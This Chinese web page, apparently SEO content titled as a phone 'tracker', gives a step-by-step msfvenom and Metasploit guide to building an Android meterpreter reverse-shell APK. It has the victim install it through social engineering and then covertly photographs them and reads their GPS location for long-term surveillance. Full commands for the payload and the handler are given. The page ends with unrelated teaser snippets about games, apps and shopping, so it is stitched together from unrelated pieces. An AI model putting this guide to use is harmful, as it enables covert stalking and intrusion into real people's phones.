手机定位录音追踪器(放手机里的微型定位器)MsfvenomKali中的metasploit有一个工具,名为msfvenom,可以生成众多版本的有效载荷,也就是可执行远控。比如,我们可以将生成的安卓apk可执行程序经过社工,安装在目标手机中,即可完成长期监听或跟踪。那如何实现呢?这里我们就要用到msf
手机定位录音追踪器(放手机里的微型定位器)
Kali中的metasploit有一个工具,名为msfvenom,可以生成众多版本的有效载荷,也就是可执行远控。
比如,我们可以将生成的安卓apk可执行程序经过社工,安装在目标手机中,即可完成长期监听或跟踪。那如何实现呢?这里我们就要用到msfvenom,接下来我们看看使用的 *** 。
kali终端下输入:
msfvenom -h 查看使用帮助
其中我们要关注的参数是,-p(指定攻击有效载荷)-f(指定生成文件的格式)
msfvenom -l payload *** sfvenom -l formats
生成远控的完整命令:
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.31.111 LPORT=8888 R> test.apk
这里没有使用-f参数,生成安卓可执行程序,可以不用。
部署可执行程序
将生成的安卓远控app安装在目标靶机中,可以通过搭建服务器,让目标下载安装apk。
启动msf
Kali终端下输入:msfconsole
继续输入:
use exploit/multi/handler
本模块专门用于设置独立的连接受理程序,这是我们寻找的最后一块拼图!在这种使用远控载荷的情况下,设置multi/handler是必须的,否则无法进程远程控制。
为该模块设置参数:
show optionsset LHOST 192.168.31.111set lport 8888
这里的设置必须和前面用msfvenom的设置保持一致。
run执行侦听,等待上线
得到meterpreter会话
一旦目标安卓手机(靶机)用户点击了我们生成的test.apk图标,我们的kali就会监听到连接信号,得到一个远程控制目标(靶机)手机的meterpreter会话。
输入"?"即可显示所有远程控制安卓手机的命令,我们这里选择最精彩的三个:
远程拍照:目标手机不会有任何察觉,属于后台系统拍照;
gps定位:直接显示经纬度地理位置,非常精准;
本文目录一览: 1、黑客帝国虚幻5怎么搜 2、黑客帝国觉醒多少g 3、黑客帝国觉醒是免费的吗 4、黑客帝国ps5进去要干什么 黑客帝国虚幻5怎么搜 用户能够在PC、PS5或是Xbox S...
假如你的手机中沒有安裝汉语翻译APP,见到不认识的外语语汇、不用去浏览器搜索,能够立即找微信来帮助。很多人不清楚手机微信内置了汉语翻译作用,并且还非常好用,不相信就讨论一下文章内容详细介绍。 搜索微...
果粉等着iPhone12发布时应该也是同样的心情,还有2天,就是花粉的狂欢节日,华为Mate40系列的国行版就要正式发布了。此前在华为Mate40系列全球发布会上,华为Mate40系列的优异表现已经让...
苏宁易购的流动,为了谢谢医护人员在新冠疫情时代支出的辛勤劳动, 天下所有医生护士,在苏宁易购APP内提交证书,认证乐成后,可获得苏宁SUPER会员一年, 类似京东PLUS会员,包罗运费券、专属商品...
现阶段目前市面上的数据库审计商品,大多数是以SQL句子、风险性、数据库查询对话为角度去追溯“数据信息被谁访问”。伴随着由安华金和2016年在中国明确提出的“网络信息安全整治”核心理念的逐渐落地式,根据...
本文目录一览: 1、谷歌和Meta在韩被重罚,涉非法收集个人信息,我们该如何保护个人隐私? 2、谷歌:智能手机遭意大利间谍软件监控,我们的智能手机还安全吗? 3、最近google浏览器好像不知...